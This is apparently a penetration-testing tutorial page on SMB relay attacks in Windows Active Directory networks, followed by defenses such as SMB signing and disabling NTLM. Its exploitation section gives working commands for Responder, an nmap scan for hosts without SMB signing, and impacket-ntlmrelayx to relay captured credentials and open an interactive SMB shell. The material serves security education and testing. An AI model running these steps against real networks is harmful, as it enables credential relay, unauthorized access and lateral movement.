SMB Relay

What is SMB?

SMB (Server Message Block) is a protocol widely used in Active Directory networks (and any other Windows network) to share files and communication between machines, usually Windows machines.

Each Windows machine by default allows connections to it by using the SMB protocol. Originally, SMB works over NetBIOS (datagram and session services) but nowadays it can be used directly over TCP. The Windows computers have the port 445/TCP open to handle SMB connections.

                                 .--------
                                |
                                |
                              .---
                   .--NBSSN-->| 139
                   |          '---
         .-----.   |            |  Windows
         | SMB |>--|            |
         '-----'   |            |  machine
            |      |          .---
            |      '---TCP--->| 445
            |                 '---
            |                   |
            |                   |
            |                   '--------
     .------------.
     |            |
  .------.   .----------.
  | NTLM |   | Kerberos |
  '------'   '----------'

As an attacker is useful to know about SMB since is used to create shares which can contain valuable information and can be used to exfiltrate information from machines.

What is SMB Relay?

Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. The following two requirements must be satisfied for SMB relay attack to work:

  • SMB signing must be disabled on the target

  • Relayed user credentials must be admin on machine

What is SMB Signing?

SMB signing verifies the origin and authenticity of SMB packets. Effectively this stops MITM SMB relay attacks from happening. If this is enabled and required on a machine we will not be able to perform a SMB relay attack.

Exploitation

Step 1: Configuration

Edit /usr/share/responder/Responder.conf:

SMB = Off
...
HTTP = Off

Step 2: Run Responder

responder -I tun0 -dw

Step 3: Discover hosts with SMB signing disabled

nmap --script=smb2-security-mode.nse -p445 <CIDR>

Save hosts with SMB signing "disabled or not required" into targets.txt.

Step 4: Use impacket-ntlmrelayx to get a SMB shell

impacket-ntlmrelayx -tf targets.txt -smb2support -i
nc 127.0.0.1 11000

Step 5: Wait for an event

When DNS error is triggered, we win.

Defense

  • Enable SMB Signing on all devices

    • Pro: Completely stops the attack

    • Con: Can cause performance issues with file copies (15% loss)

  • Disable NTLM authentication on network

    • Pro: Completely stops the attack

    • Con: If Kerberos stops working, Windows defaults back to NTLM

  • Account tiering

    • Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA)

    • Con: Enforcing the policy may be difficult

  • Local admin restriction

    • Pro: Can prevent a lot of lateral movement

    • Con: Potential increase in the amount of service desk tickets

PreviousLLMNR PoisoningNextGPP / cPassword

Last updated